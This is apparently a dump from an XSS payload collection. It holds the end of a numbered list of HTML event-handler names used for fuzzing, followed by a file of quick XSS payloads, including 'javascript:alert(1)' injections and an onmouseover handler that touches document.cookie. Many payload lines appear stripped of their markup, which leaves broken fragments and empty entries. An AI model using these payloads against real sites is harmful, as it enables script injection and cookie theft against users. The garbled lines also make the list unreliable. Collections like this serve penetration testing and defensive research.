onbegin 16 | onblur 17 | onbounce 18 | oncanplay 19 | oncanplaythrough 20 | onchange 21 | onclick 22 | onclose 23 | oncontextmenu 24 | oncopy 25 | oncuechange 26 | oncut 27 | ondblclick 28 | ondrag 29 | ondragend 30 | ondragenter 31 | ondragexit 32 | ondragleave 33 | ondragover 34 | ondragstart 35 | ondrop 36 | ondurationchange 37 | onend 38 | onended 39 | onerror 40 | onfinish 41 | onfocus 42 | onfocusin 43 | onfocusout 44 | onformdata 45 | onfullscreenchange 46 | onhashchange 47 | oninput 48 | oninvalid 49 | onkeydown 50 | onkeypress 51 | onkeyup 52 | onload 53 | onloadeddata 54 | onloadedmetadata 55 | onloadstart 56 | onmessage 57 | onmousedown 58 | onmouseenter 59 | onmouseleave 60 | onmousemove 61 | onmouseout 62 | onmouseover 63 | onmouseup 64 | onmousewheel 65 | onmozfullscreenchange 66 | onpagehide 67 | onpageshow 68 | onpaste 69 | onpause 70 | onplay 71 | onplaying 72 | onpointerdown 73 | onpointerenter 74 | onpointerleave 75 | onpointermove 76 | onpointerout 77 | onpointerover 78 | onpointerrawupdate 79 | onpointerup 80 | onpopstate 81 | onprogress 82 | onratechange 83 | onrepeat 84 | onreset 85 | onresize 86 | onscroll 87 | onscrollend 88 | onsearch 89 | onseeked 90 | onseeking 91 | onselect 92 | onselectionchange 93 | onselectstart 94 | onshow 95 | onstart 96 | onsubmit 97 | onsuspend 98 | ontimeupdate 99 | ontoggle 100 | ontouchend 101 | ontouchmove 102 | ontouchstart 103 | ontransitioncancel 104 | ontransitionend 105 | ontransitionrun 106 | ontransitionstart 107 | onunhandledrejection 108 | onunload 109 | onvolumechange 110 | onwebkitanimationend 111 | onwebkitanimationiteration 112 | onwebkitanimationstart 113 | onwebkittransitionend 114 | onwheel 115 | -------------------------------------------------------------------------------- /XSS Injection/Intruders/xss_payloads_quick.txt: -------------------------------------------------------------------------------- 1 | javascript:alert(1)//INJECTX 2 | //INJECTX 3 | //INJECTX 4 | //INJECTX 5 | INJECTX 
HOVER 6 | onmouseover="document.cookie=true;">//INJECTX 7 | alert(1)>//INJECTX 8 |

INJECTX

9 | 10 | //INJECTX 11 | 12 |

a//INJECTX 18 | 19 |

a 20 | 21 | 22 | 23 | //INJECTX 35 | //INJECTX 36 | //INJECTX 37 |